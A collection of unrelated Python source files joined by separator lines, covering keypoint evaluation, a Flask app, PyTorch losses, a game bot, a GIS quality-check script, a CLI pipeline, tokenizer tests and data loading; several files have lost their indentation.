def _coco_keypoint_results_one_category_kernel(self, data_pack):
"""Get coco keypoint results."""
cat_id = data_pack['cat_id']
keypoints = data_pack['keypoints']
cat_results = []
for img_kpts in keypoints:
if len(img_kpts) == 0:
continue
_key_points = np.array(
[img_kpt['keypoints'] for img_kpt in img_kpts])
key_points = _key_points.reshape(-1,
self.ann_info['num_joints'] * 3)
cuts = np.cumsum([
0, self.body_num, self.foot_num, self.face_num,
self.left_hand_num, self.right_hand_num
]) * 3
result = [{
'image_id': img_kpt['image_id'],
'category_id': cat_id,
'keypoints': key_point[cuts[0]:cuts[1]].tolist(),
'foot_kpts': key_point[cuts[1]:cuts[2]].tolist(),
'face_kpts': key_point[cuts[2]:cuts[3]].tolist(),
'lefthand_kpts': key_point[cuts[3]:cuts[4]].tolist(),
'righthand_kpts': key_point[cuts[4]:cuts[5]].tolist(),
'score': float(img_kpt['score']),
'center': img_kpt['center'].tolist(),
'scale': img_kpt['scale'].tolist()
} for img_kpt, key_point in zip(img_kpts, key_points)]
cat_results.extend(result)
return cat_results
def _do_python_keypoint_eval(self, res_file):
"""Keypoint evaluation using COCOAPI."""
coco_det = self.coco.loadRes(res_file)
cuts = np.cumsum([
0, self.body_num, self.foot_num, self.face_num, self.left_hand_num,
self.right_hand_num
])
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_body',
self.sigmas[cuts[0]:cuts[1]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_foot',
self.sigmas[cuts[1]:cuts[2]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_face',
self.sigmas[cuts[2]:cuts[3]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_lefthand',
self.sigmas[cuts[3]:cuts[4]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_righthand',
self.sigmas[cuts[4]:cuts[5]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_wholebody',
self.sigmas,
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
stats_names = [
'AP', 'AP .5', 'AP .75', 'AP (M)', 'AP (L)', 'AR', 'AR .5',
'AR .75', 'AR (M)', 'AR (L)'
]
info_str = list(zip(stats_names, coco_eval.stats))
return info_str
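
# Illustrative sketch (not part of mmpose): how the cumulative `cuts` used in the
# result and evaluation kernels above partition the 133 COCO-WholeBody keypoints.
if __name__ == "__main__":
    counts = [17, 6, 68, 21, 21]  # body, foot, face, left hand, right hand
    cuts = np.cumsum([0] + counts)
    print(cuts.tolist())  # [0, 17, 23, 91, 112, 133]; e.g. face keypoints are indexes 23..90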
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from flask import Flask
from flask_assets import Environment, Bundle
import logging
from logging.handlers import RotatingFileHandler
from platus.web import web
from platus.api import api
from platus.config import config
application = Flask(__name__,
                    static_folder="platus/static/",
                    template_folder="platus/templates/",
                    static_url_path="/static")
application.register_blueprint(web)
application.register_blueprint(api)
application.config.update(config.from_yaml("data/config.yaml"))
# Scss
assets = Environment(application)
assets.versions = 'timestamp'
assets.url_expire = True
assets.manifest = 'file:/tmp/manifest.to-be-deployed' # explicit filename
assets.cache = False
assets.auto_build = True
assets.url = application.static_url_path
scss = Bundle('scss/00_main.scss', filters='pyscss', output='css/main.css', depends=['scss/*.scss'])
assets.register('scss_all', scss)
assets.debug = False
application.config['ASSETS_DEBUG'] = False
# Set Logger
log_levels = {
"info": logging.INFO,
"debug": logging.DEBUG,
"error": logging.ERROR,
"critical": logging.CRITICAL
}
log_level = log_levels[application.config.get("log_level", "info")]
log = logging.getLogger(__name__)
console_formatter = logging.Formatter(
'%(levelname)s\t%(filename)s:%(lineno)d\t\t%(message)s', '%m-%d %H:%M:%S')
file_formatter = logging.Formatter(
'%(levelname)s - %(asctime)s - %(pathname)s - %(lineno)d - %(message)s', '%m-%d %H:%M:%S')
console_handler = logging.StreamHandler()
console_handler.setLevel(log_level)
console_handler.setFormatter(console_formatter)
rotatingfile_handler = RotatingFileHandler('platus.log', maxBytes=10000, backupCount=1)
rotatingfile_handler.setLevel(log_level)
rotatingfile_handler.setFormatter(file_formatter)
application.logger.addHandler(console_handler)
application.logger.addHandler(rotatingfile_handler)
application.logger.setLevel(log_level)
if __name__ == '__main__':
application.run(host="0.0.0.0", port=5001)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from torch.autograd import Variable
import torch
import os
import matplotlib.pyplot as plt
class TVLoss(torch.nn.Module):
def __init__(self,TVLoss_weight=1):
super(TVLoss,self).__init__()
self.TVLoss_weight = TVLoss_weight
def forward(self,x):
batch_size = x.size()[0]
h_x = x.size()[2]
w_x = x.size()[3]
count_h = self._tensor_size(x[:,:,1:,:])
count_w = self._tensor_size(x[:,:,:,1:])
h_tv = torch.pow((x[:,:,1:,:]-x[:,:,:h_x-1,:]),2).sum()
w_tv = torch.pow((x[:,:,:,1:]-x[:,:,:,:w_x-1]),2).sum()
return self.TVLoss_weight*2*(h_tv/count_h+w_tv/count_w)/batch_size
def _tensor_size(self, t):
return t.size()[1]*t.size()[2]*t.size()[3]
def criterion_TV(inpt):
return torch.sum(torch.abs(inpt[:, :, :, :-1] - inpt[:, :, :, 1:])) + \
torch.sum(torch.abs(inpt[:, :, :-1, :] - inpt[:, :, 1:, :]))
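
# Quick illustrative check (toy random CPU tensor) of the two total-variation
# penalties defined above: TVLoss is the squared-difference variant normalized by
# batch size, criterion_TV is the unnormalized absolute-difference variant.
if __name__ == "__main__":
    x = torch.rand(2, 3, 8, 8)  # (batch, channels, height, width)
    print(TVLoss(TVLoss_weight=1)(x).item())
    print(criterion_TV(x).item())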
|
def near_islands(game,my_pirate,islands):
nearest = 999999
dist = 0
closest_island=islands[0]
for island in islands:
dist = game.distance(my_pirate,island)
if island.team_capturing == game.NEUTRAL:
dist = dist / 2
        if dist < nearest:
            # keep the (possibly halved) distance so neutral islands stay preferred
            nearest = dist
            closest_island = island
return closest_island
def near_enemies(game,my_pirate,enemies):
nearest = 999999
dist = 0
closest_island=enemies[0]
for enemy in enemies:
dist = game.distance(my_pirate,enemy)
if dist<nearest:
nearest = dist
closest_island=enemy
return closest_island
def do_turn(game):
pirates = game.my_pirates()
if len(pirates) == 0:
return
islands = game.not_my_islands()
enemies = game.enemy_pirates()
if len(islands) == 0:
if len(enemies) != 0:
i = 0
for pirate in pirates:
direction = game.get_directions(pirate, near_enemies(game,pirate,enemies))[0]
game.set_sail(pirate, direction)
i += 1
if i >= len(enemies) or i >= 2:
i = 0
else:
i = 0
isl = list(islands)
for pirate in pirates:
if not game.is_capturing(pirate):
if len(isl) == 0:
isl = list(islands)
direction = game.get_directions(pirate, near_islands(game,pirate,isl))[0]
game.set_sail(pirate, direction)
i += 1
if i >= len(islands) or i >= 2:
i = 0
isl.remove(near_islands(game,pirate,isl))
|
"""
The main script that serves as the entry-point for all kinds of training experiments.
"""
import sys
from pathlib import Path
import pytorch_lightning as pl
from das.data.data_args import DataArguments
from das.data.data_modules.factory import DataModuleFactory
from das.model_analyzer.analyzer_args import AnalysisTaskArguments, AnalyzerArguments
from das.model_analyzer.utils import DataCacher
from das.models.model_args import ModelArguments, ModelFactory
from das.utils.basic_args import BasicArguments
from das.utils.basic_utils import create_logger
logger = create_logger(__name__)
class AnalysisTask:
def __init__(
self,
task_output_name,
basic_args: BasicArguments,
data_args: DataArguments,
model_args: ModelArguments,
analyzer_args: AnalyzerArguments,
analysis_task_args: AnalysisTaskArguments,
) -> None:
self.task_output_name = task_output_name
self.basic_args = basic_args
self.data_args = data_args
self.model_args = model_args
self.analyzer_args = analyzer_args
self.analysis_task_args = analysis_task_args
# setup datamodule
self.datamodule = self.setup_datamodule()
# setup the model
self.model = self.setup_model()
# setup analyser output dir
self.output_dir = self.setup_output_dir()
# setup data caching
self.data_cachers = {}
for cacher_type in ["pickle", "json"]:
self.data_cachers[cacher_type] = self.setup_data_cacher(cacher_type)
def setup_datamodule(self):
# initialize data-handling module, set collate_fns later
datamodule = DataModuleFactory.create_datamodule(
self.basic_args, self.data_args
)
# prepare the modules
datamodule.prepare_data()
datamodule.setup()
self.num_labels = datamodule.num_labels
self.labels = datamodule.labels
        # return the prepared datamodule
return datamodule
def setup_output_dir(self):
output_dir = (
Path(self.analyzer_args.analyzer_output_dir) / self.data_args.dataset_name
)
if self.analyzer_args.output_data_subdir != "":
output_dir = output_dir / self.analyzer_args.output_data_subdir
output_dir = output_dir / self.model.model_name
if not output_dir.exists():
output_dir.mkdir(parents=True)
return output_dir
def setup_data_cacher(self, cacher_type):
return DataCacher(self.output_dir, cacher_type=cacher_type)
def setup_model(self):
# get model class
model_class = ModelFactory.get_model_class(
self.model_args.model_name, self.model_args.model_task
)
        # if a model checkpoint is present, use it to load the weights;
        # otherwise initialize a fresh model for analysis
        if self.model_args.model_checkpoint_file is None:
            # initialize the model without pretrained weights
model = model_class(
self.basic_args,
self.model_args,
training_args=None,
data_args=self.data_args,
datamodule=self.datamodule,
)
else:
if not self.model_args.model_checkpoint_file.startswith("http"):
model_checkpoint = Path(self.model_args.model_checkpoint_file)
if not model_checkpoint.exists():
logger.error(
f"Checkpoint not found, cannot load weights from {model_checkpoint}."
)
sys.exit(1)
else:
model_checkpoint = self.model_args.model_checkpoint_file
logger.info(f"Loading model from model checkpoint: {model_checkpoint}")
# load model weights from checkpoint
model = model_class.load_from_checkpoint(
model_checkpoint,
strict=True,
basic_args=self.basic_args,
model_args=self.model_args,
training_args=None,
data_args=self.data_args,
datamodule=self.datamodule,
)
# set model device
model = model.cuda()
# put model in evaluation mode
model.eval()
return model
def test_model(self):
# get data collator required for the model
self.datamodule.collate_fns = self.model.get_data_collators(
self.data_args, None
)
# initialize the training
trainer = pl.Trainer(
gpus=self.basic_args.n_gpu,
num_nodes=self.basic_args.n_nodes,
)
# get test results
return trainer.test(self.model, datamodule=self.datamodule, verbose=False)
|
__file__ = 'OffSystem_v1'
__date__ = '5/29/14'
__author__ = 'ABREZNIC'
import os, arcpy, xlwt, datetime
#date
now = datetime.datetime.now()
curMonth = now.strftime("%m")
curDay = now.strftime("%d")
curYear = now.strftime("%Y")
today = curYear + "_" + curMonth + "_" + curDay
#variables
qcfolder = "C:\\TxDOT\\QC\\OffSystem"
roadways = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.Roadways\\TPP_GIS.APP_TPP_GIS_ADMIN.TXDOT_Roadways"
where = """ RTE_CLASS = '2' OR RTE_CLASS = '3' """
subfiles = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.SUBFILES"
cities = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.City\\TPP_GIS.APP_TPP_GIS_ADMIN.City"
districts = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.District\\TPP_GIS.APP_TPP_GIS_ADMIN.District"
workspace = qcfolder + "\\" + today
if not os.path.exists(workspace):
os.makedirs(workspace)
else:
for file in os.listdir(workspace):
thefile = os.path.join(workspace, file)
os.remove(thefile)
#print "Folder already exists for today. Please ether rename or delete the QC folder with today's date."
def overlap():
print "starting " + str(now)
arcpy.Select_analysis(roadways, workspace + "\\FC_Streets.shp", """ RTE_CLASS = '3' """)
arcpy.Erase_analysis(workspace + "\\FC_Streets.shp", cities, workspace + "\\FC_Streets_Errors.shp")
print "fc"
arcpy.Clip_analysis(roadways, cities, workspace + "\\City_Roads.shp")
print "City"
arcpy.Select_analysis(workspace + "\\City_Roads.shp", workspace + "\\County_Roads_Errors.shp", """ RTE_CLASS = '2' """)
print "cr select"
arcpy.Merge_management([workspace + "\\County_Roads_Errors.shp", workspace + "\\FC_Streets_Errors.shp"], workspace + "\\MergedErrors.shp")
print "merge"
arcpy.SpatialJoin_analysis(workspace + "\\MergedErrors.shp", districts, workspace + "\\City_OverlapErrors.shp")
print "SJ"
arcpy.Delete_management(workspace + "\\City_Roads.shp")
arcpy.Delete_management(workspace + "\\FC_Streets.shp")
arcpy.Delete_management(workspace + "\\County_Roads_Errors.shp")
arcpy.Delete_management(workspace + "\\FC_Streets_Errors.shp")
arcpy.Delete_management(workspace + "\\MergedErrors.shp")
print "end " + str(now)
errors = []
cursor = arcpy.UpdateCursor(workspace + "\\City_OverlapErrors.shp")
for row in cursor:
geom = row.shape
        length_mi = geom.length * .000621371  # convert shape length from meters to miles
        row.setValue("RTE_LEN", length_mi)
cursor.updateRow(row)
rowinfo = [row.RTE_ID, row.RTE_LEN, row.DIST_NM, row.DIST_NBR]
errors.append(rowinfo)
del cursor
del row
return errors
def routeopen():
cursor = arcpy.SearchCursor(roadways, where)
errors = []
for row in cursor:
errorinfo = []
id = row.RTE_ID
if row.RTE_OPEN == 1:
rte_subfiles = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for record in rte_subfiles:
status = record.HIGHWAY_STATUS
if status != 4:
errorinfo.append(id)
errorinfo.append(row.RTE_OPEN)
errorinfo.append(status)
errorinfo.append("RTE_OPEN = 1 requires HIGHWAY_STATUS = 4")
errors.append(errorinfo)
elif row.RTE_OPEN == 0:
rte_subfiles = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for record in rte_subfiles:
status = record.HIGHWAY_STATUS
if status != 0:
errorinfo.append(id)
errorinfo.append(row.RTE_OPEN)
errorinfo.append(status)
errorinfo.append("RTE_OPEN = 0 requires HIGHWAY_STATUS = 0")
errors.append(errorinfo)
else:
errorinfo.append(id)
errorinfo.append(row.RTE_OPEN)
errorinfo.append("N/A")
errorinfo.append("RTE_OPEN must be 1 or 0")
errors.append(errorinfo)
    del cursor
    del row
    return errors
def measurelength():
cursor = arcpy.UpdateCursor(roadways, where)
errors = []
for row in cursor:
errorinfo = []
id = row.RTE_ID
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
Mdiff = abs(Mmax - Mmin)
wholelen = geom.length * .000621371
shp_len = round(wholelen, 3)
rte_len = row.RTE_LEN
testlen = abs(shp_len - Mdiff)
if testlen <= .003 and abs(rte_len - testlen) > .003:
row.setValue("RTE_LEN", wholelen)
cursor.updateRow(row)
elif abs(shp_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errors.append(errorinfo)
elif abs(rte_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errors.append(errorinfo)
elif abs(shp_len - rte_len) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errors.append(errorinfo)
else:
pass
    del cursor
    del row
    return errors
def subfilelength():
dictionary = {}
cursor = arcpy.SearchCursor(roadways, where)
for row in cursor:
id = row.RTE_ID
len = row.RTE_LEN
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
if id not in dictionary.keys():
dictionary[str(id)] = [len, Mmin, Mmax]
else:
currentrecord = dictionary[id]
currentlength = currentrecord[0]
currentmin = currentrecord[1]
currentmax = currentrecord[2]
newlen = currentlength + len
if Mmin < currentmin:
currentmin = Mmin
if Mmax > currentmax:
currentmax = Mmax
dictionary[str(id)] = [newlen, currentmin, currentmax]
del cursor
del row
errors = []
for i in dictionary.keys():
firstflag = 0
sublength = 0
linevalues = dictionary[i]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
cursor = arcpy.SearchCursor(subfiles, "RTE_ID = '" + i + "'", "", "", "BMP A")
for row in cursor:
if firstflag == 0:
bmp1 = row.BMP
firstflag += 1
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp-bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append("BMP and EMP difference does not equal the LEN_OF_SECTION. OBJECTID: " + row.OBJECTID)
errors.append(errorinfo)
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
if abs(linemin - bmp1) > .001:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
if abs(linemax - emp) > .001:
errorinfo = []
errorinfo.append(i)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
return errors
def assemblereport():
book = xlwt.Workbook()
print "Overlap Errors..."
overlapsheet = book.add_sheet("City Boundary Overlap")
line = 0
overlapsheet.write(line, 0, "The following Route IDs are County Roads and FC Streets which cross a City Boundary as found in City_OverlapErrors.shp")
line += 1
overlapsheet.write(line, 0, "RTE_ID")
overlapsheet.write(line, 1, "Overlap Length")
overlapsheet.write(line, 2, "District Name")
overlapsheet.write(line, 3, "District Number")
line += 1
overlaplist = overlap()
for i in overlaplist:
overlapsheet.write(line, 0, i[0])
overlapsheet.write(line, 1, i[1])
overlapsheet.write(line, 2, i[2])
overlapsheet.write(line, 3, i[3])
line += 1
print "Route Open Errors..."
opensheet = book.add_sheet("Route Open")
line = 0
opensheet.write(line, 0, "The following Route IDs contain an error between RTE_OPEN in TxDOT_Roadways and ROADWAY_STATUS in SUBFILES")
line += 1
opensheet.write(line, 0, "RTE_ID")
opensheet.write(line, 1, "RTE_OPEN")
opensheet.write(line, 2, "HIGHWAY_STATUS")
opensheet.write(line, 3, "Description")
line += 1
openlist = routeopen()
for i in openlist:
opensheet.write(line, 0, i[0])
opensheet.write(line, 1, i[1])
opensheet.write(line, 2, i[2])
opensheet.write(line, 3, i[3])
line += 1
print "Geometry and Measure Errors..."
geomsheet = book.add_sheet("Geometry and Measures")
line = 0
geomsheet.write(line, 0, "The following Route IDs contain an error between their measures' length, shape length, and RTE_LEN")
line += 1
geomsheet.write(line, 0, "RTE_ID")
geomsheet.write(line, 1, "Measures' Length")
geomsheet.write(line, 2, "Shape Length")
geomsheet.write(line, 3, "RTE_LEN")
line += 1
geomlist = measurelength()
for i in geomlist:
geomsheet.write(line, 0, i[0])
geomsheet.write(line, 1, i[1])
geomsheet.write(line, 2, i[2])
geomsheet.write(line, 3, i[3])
line += 1
print "Subfile Length Errors..."
subsheet = book.add_sheet("Subfile Lengths")
line = 0
subsheet.write(line, 0, "The following Route IDs contain an error between their line and SUBFILES lengths")
line += 1
subsheet.write(line, 0, "RTE_ID")
subsheet.write(line, 1, "District")
subsheet.write(line, 2, "BMP")
subsheet.write(line, 3, "Min Measure")
subsheet.write(line, 4, "EMP")
subsheet.write(line, 5, "Max Measure")
subsheet.write(line, 6, "Subfile Len")
subsheet.write(line, 7, "RTE_LEN")
subsheet.write(line, 8, "Description")
line += 1
sublist = subfilelength()
for i in sublist:
subsheet.write(line, 0, i[0])
subsheet.write(line, 1, i[1])
subsheet.write(line, 2, i[2])
subsheet.write(line, 3, i[3])
subsheet.write(line, 4, i[4])
subsheet.write(line, 5, i[5])
subsheet.write(line, 6, i[6])
subsheet.write(line, 7, i[7])
subsheet.write(line, 8, i[8])
line += 1
book.save(workspace + "\\ErrorReport_" + today + ".xls")
print "and away we go... " + str(now)
assemblereport()
print "that's all folks!" + str(now)
|
from rest_framework import serializers
from thenewboston.constants.network import PRIMARY_VALIDATOR
from thenewboston.serializers.network_block import NetworkBlockSerializer
from thenewboston.transactions.validation import validate_transaction_exists
from v1.self_configurations.helpers.self_configuration import get_self_configuration
class BlockSerializer(NetworkBlockSerializer):
def create(self, validated_data):
raise RuntimeError('Method unavailable')
def update(self, instance, validated_data):
raise RuntimeError('Method unavailable')
def validate(self, data):
"""Verify that correct payment exist for the Primary Validator"""
data = super(BlockSerializer, self).validate(data)
account_number = data['account_number']
message = data['message']
txs = message['txs']
self_configuration = get_self_configuration(exception_class=RuntimeError)
if account_number != self_configuration.account_number:
validate_transaction_exists(
amount=self_configuration.default_transaction_fee,
fee=PRIMARY_VALIDATOR,
error=serializers.ValidationError,
recipient=self_configuration.account_number,
txs=txs
)
return data
|
import sys
# Credit to Hugh Bothwell from http://stackoverflow.com/questions/5084743/how-to-print-pretty-string-output-in-python
class TablePrinter(object):
"Print a list of dicts as a table"
def __init__(self, fmt, sep=' ', ul=None):
"""
@param fmt: list of tuple(heading, key, width)
heading: str, column label
key: dictionary key to value to print
width: int, column width in chars
@param sep: string, separation between columns
@param ul: string, character to underline column label, or None for no underlining
"""
super(TablePrinter,self).__init__()
self.fmt = str(sep).join('{lb}{0}:{1}{rb}'.format(key, width, lb='{', rb='}') for heading,key,width in fmt)
self.head = {key:heading for heading,key,width in fmt}
self.ul = {key:str(ul)*width for heading,key,width in fmt} if ul else None
self.width = {key:width for heading,key,width in fmt}
def row(self, data):
if sys.version_info < (3,):
return self.fmt.format(**{ k:str(data.get(k,''))[:w] for k,w in self.width.iteritems() })
else:
return self.fmt.format(**{ k:str(data.get(k,''))[:w] for k,w in self.width.items() })
def __call__(self, dataList):
_r = self.row
res = [_r(data) for data in dataList]
res.insert(0, _r(self.head))
if self.ul:
res.insert(1, _r(self.ul))
return '\n'.join(res)
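
# Illustrative usage sketch of TablePrinter (the column spec and rows below are made up):
if __name__ == "__main__":
    fmt = [('Name', 'name', 10), ('Age', 'age', 3)]
    rows = [{'name': 'alice', 'age': 30}, {'name': 'bob', 'age': 7}]
    print(TablePrinter(fmt, ul='=')(rows))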
|
import argparse
import sys
import datetime
import os
from mtsv.parameters import Parameters
from mtsv.commands import (
Init,
Readprep,
Binning,
Summary,
Analyze,
Extract,
Pipeline
)
from mtsv.parsing import (
TYPES,
make_sub_parser,
parse_config_sections,
get_missing_sections,
add_default_arguments)
from mtsv.utils import (
error,
warn,
set_log_file
)
from mtsv import (
DEFAULT_LOG_FNAME,
DEFAULT_CFG_FNAME)
COMMANDS = {
"analyze": Analyze,
"binning": Binning,
"readprep": Readprep,
"summary": Summary,
"extract": Extract,
"pipeline": Pipeline
}
def add_cfg_to_args(argv, parser):
'''treat config arguments as command line
arguments to catch argparse errors'''
config = get_config_from_argv(argv)
cmd_cfg_section = get_command_from_argv(argv).config_section
config_args = parse_config_sections(
config,
cmd_cfg_section)
for k, v in config_args.items():
fmt_k = "--{}".format(k)
        if fmt_k not in argv and v is not None:
argv += [fmt_k] + v.split(" ")
missing = set(cmd_cfg_section).intersection(
set(get_missing_sections(config)))
args, snake_args = parser.parse_known_args(argv[1:])
return args, snake_args, missing
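
def _demo_config_merge():
    """Standalone sketch (hypothetical flag names and values) of the merge rule used
    by add_cfg_to_args above: a config value is appended as an extra command-line
    option only when its flag is absent from argv and the value is not None."""
    config_args = {"threads": "4", "kmer": None}
    argv = ["mtsv", "binning", "--threads", "8"]
    for k, v in config_args.items():
        fmt_k = "--{}".format(k)
        if fmt_k not in argv and v is not None:
            argv += [fmt_k] + v.split(" ")
    return argv  # ['mtsv', 'binning', '--threads', '8'] -- threads kept from argv, kmer skipped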
def get_command_from_argv(argv):
return COMMANDS[argv[1]]
def get_config_from_argv(argv):
index = -1
opts = ['-c', '--config']
for opt in opts:
if opt in argv:
index = argv.index(opt)
if index != -1:
return argv[index + 1]
def change_wkdir(argv):
index = -1
opts = ['--working_dir', '-wd']
for opt in opts:
if opt in argv:
index = argv.index(opt)
if index != -1:
argv[index + 1] = TYPES['project_dir_type'](argv[index + 1])
def setup_and_run(argv, parser):
"""Setup and run a command."""
change_wkdir(argv)
if argv[1] != "init":
if '--config' in argv or '-c' in argv:
args, snake_args, missing = add_cfg_to_args(argv, parser)
if missing:
warn(
"Section(s) missing in config file, "
"using defaults: {}".format(", ".join(missing)))
else:
args, snake_args = parser.parse_known_args()
args.log_file = set_log_file(
args.log_file,
args.cmd_class.__name__,
args.timestamp)
else:
args, snake_args = parser.parse_args(), []
params = Parameters(args, snake_args)
cmd = args.cmd_class(params)
cmd.run()
def main(argv=None):
if argv is None:
argv = sys.argv
parser = argparse.ArgumentParser(
prog="mtsv",
description="Metagenomic analysis pipeline",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.set_defaults(timestamp=datetime.datetime.now().strftime(
'%Y-%m-%d_%H-%M-%S'))
subparsers = parser.add_subparsers(
title="commands", metavar="COMMAND",
help="Pipeline Commands")
parser_init = subparsers.add_parser(
'init',
help="Initializes a directory with a pre-filled parameters file"
)
parser_init.add_argument(
"-c", "--config", type=TYPES['write_handle_type'],
default=DEFAULT_CFG_FNAME,
help="Specify path to write config file, "
"not required if using default config (Default: ./mtsv.cfg)"
)
parser_init.add_argument(
'-wd', "--working_dir", type=str,
default=os.getcwd(),
help="Specify working directory to place output. "
"(default: {})".format(os.getcwd())
)
parser_init.set_defaults(cmd_class=Init)
for command, cmd_class in COMMANDS.items():
make_sub_parser(
subparsers, command, cmd_class)
# Return help if no command is passed
if len(argv) == 1:
parser.print_help(sys.stdout)
sys.exit(0)
try:
setup_and_run(argv, parser)
except KeyboardInterrupt:
error("\n-- Stopped by user --", exception=False)
if __name__ == "__main__":
main()
|
"""
The 20 commonly occurring amino acids are abbreviated by using 20 letters from the English alphabet (all letters
except for B, J, O, U, X, and Z). Protein strings are constructed from these 20 symbols. Henceforth, the term genetic
string will incorporate protein strings along with DNA strings and RNA strings.
The RNA codon table dictates the details regarding the encoding of specific codons into the amino acid alphabet.
Given: An RNA string s corresponding to a strand of mRNA (of length at most 10 kbp).
Return: The protein string encoded by s.
"""
from typing import List
import rps.sequence_problems.sequences as seq
def translate_dna(lines: List[str]) -> str:
"""
    :param lines: A single line containing the RNA string to translate
    :return: The protein string encoded by that RNA string
"""
# only one is expected
sequence, = lines
rna = seq.RNA(sequence)
protein = rna.translate_to_protein()
return protein.sequence
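
# Minimal illustrative sketch (independent of the rps package above) of how an RNA
# codon table drives the translation performed by translate_dna: read three bases at
# a time and map each codon to an amino acid until a stop codon is reached.
if __name__ == "__main__":
    codon_table = {"AUG": "M", "GCC": "A", "UAA": "Stop"}  # tiny excerpt of the full table
    rna_string = "AUGGCCUAA"
    protein = ""
    for i in range(0, len(rna_string), 3):
        amino_acid = codon_table[rna_string[i:i + 3]]
        if amino_acid == "Stop":
            break
        protein += amino_acid
    print(protein)  # -> "MA"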
|
from typing import Dict
from fastapi.testclient import TestClient
import pytest
from konoha.api.server import create_app
app = create_app()
client = TestClient(app)
@pytest.mark.parametrize(
"tokenizer_params", [
{"tokenizer": "mecab"},
{"tokenizer": "sudachi", "mode": "A"},
{"tokenizer": "sudachi", "mode": "B"},
{"tokenizer": "sudachi", "mode": "C"},
{"tokenizer": "sentencepiece", "model_path": "data/model.knm"},
{"tokenizer": "kytea", "model_path": "data/model.knm"},
{"tokenizer": "character"},
{"tokenizer": "nagisa"},
{"tokenizer": "janome"},
]
)
def test_tokenization(tokenizer_params: Dict):
headers = {"Content-Type": "application/json"}
params = dict(tokenizer_params, text="私は猫")
response = client.post("/api/v1/tokenize", headers=headers, json=params)
assert response.status_code == 200
assert "tokens" in response.json()
|
# Write a program that asks the user for a Login Name and password. Then when they type "lock", they need to type in their name and password to unlock the program.
user = str(input("Please provide a loginname: "))
unlock_user = str()
password = str(input("Please provide your password: "))
unlock_pw = str()
lock = str()
#while lock != "unlock":
# lock = input("The console is now locked. \nYou will be prompted to enter your username and password. \nTo unlock, enter 'unlock': ")
print("To lock your computer type 'lock'.")
while lock != "lock":
lock = input("What is your command? ")
while unlock_user != user:
unlock_user = input("Enter your Username: ")
while unlock_pw != password:
unlock_pw = input("Enter your Password: ")
print("Welcome to the Accelerated World,", user + ".")
|
import pandas as pd
import numpy as np
import torch
def min_max_x(x):
for index, col in enumerate(x.T):
min_col = np.min(col)
max_col = np.max(col)
if min_col != max_col:
x.T[index] = (x.T[index] - min_col)/(max_col - min_col)
else:
x.T[index] = x.T[index] - min_col
return x
def load_dataset(path='./processed_dataset/data.csv', split=0.8, shuffle=True, seed=0):
np.random.seed(seed)
df = pd.read_csv(path)
df = df.values
if shuffle:
np.random.shuffle(df)
train = df[:int(df.shape[0]*split)]
validation = df[int(df.shape[0]*split):]
train_x, train_y = train.T[:12].T, train.T[12:].T
validation_x, validation_y = validation.T[:12].T, validation.T[12:].T
train_x, validation_x = min_max_x(train_x), min_max_x(validation_x)
train_x, train_y, validation_x, validation_y = train_x.astype(np.float32), train_y.astype(np.float32), validation_x.astype(np.float32), validation_y.astype(np.float32)
train_x, train_y, validation_x, validation_y = torch.from_numpy(train_x), torch.from_numpy(train_y), torch.from_numpy(validation_x), torch.from_numpy(validation_y)
